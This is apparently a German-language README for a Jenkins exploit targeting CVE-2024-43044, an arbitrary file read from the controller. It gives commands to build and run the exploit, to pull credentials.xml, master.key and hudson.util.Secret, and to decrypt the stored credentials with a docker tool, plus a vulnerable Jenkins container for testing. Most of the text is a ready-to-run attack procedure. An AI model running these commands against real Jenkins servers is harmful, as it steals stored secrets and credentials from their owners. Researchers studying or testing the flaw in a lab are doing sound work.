
Exploit für CVE-2024-43044, der beliebiges Dateilesen vom Jenkins-Controller ermöglicht, um credentials.xml mit geheimen Schlüsseln zu extrahieren und zu entschlüsseln.
Dies ist ein Exploit für CVE-2024-43044, ein beliebiges Dateilesen, das es einem Agenten ermöglicht, Dateien vom Controller abzurufen.
Der Exploit wird die Schwachstelle nutzen, um die Datei credentials.xml zu lesen und geheime Schlüssel zu erhalten, mit denen sie entschlüsselt wird.
Ursprünglicher Code : https://github.com/convisolabs/CVE-2024-43044-jenkins Ursprünglicher Artikel : https://blog.convisoappsec.com/en/analysis-of-cve-2024-43044/
mvn package
java -jar exploit.jar mode_secret <jenkinsUrl> <nodeName> <nodeSecretKey>
docker run \
--rm \
--network none \
--workdir / \
--mount "type=bind,src=$PWD/master.key,dst=/master.key" \
--mount "type=bind,src=$PWD/hudson.util.Secret,dst=/hudson.util.Secret" \
--mount "type=bind,src=$PWD/credentials.xml,dst=/credentials.xml" \
docker.io/hoto/jenkins-credentials-decryptor:latest \
/jenkins-credentials-decryptor \
-m master.key \
-s hudson.util.Secret \
-c credentials.xml \
-o json
Du kannst es in einer verwundbaren Version mit Docker testen:
docker run -p 8080:8080 -p 50000:50000 --restart=on-failure jenkins/jenkins:2.441-jdk17
Sobald du einen laufenden Jenkins hast, richte einen Agenten ein.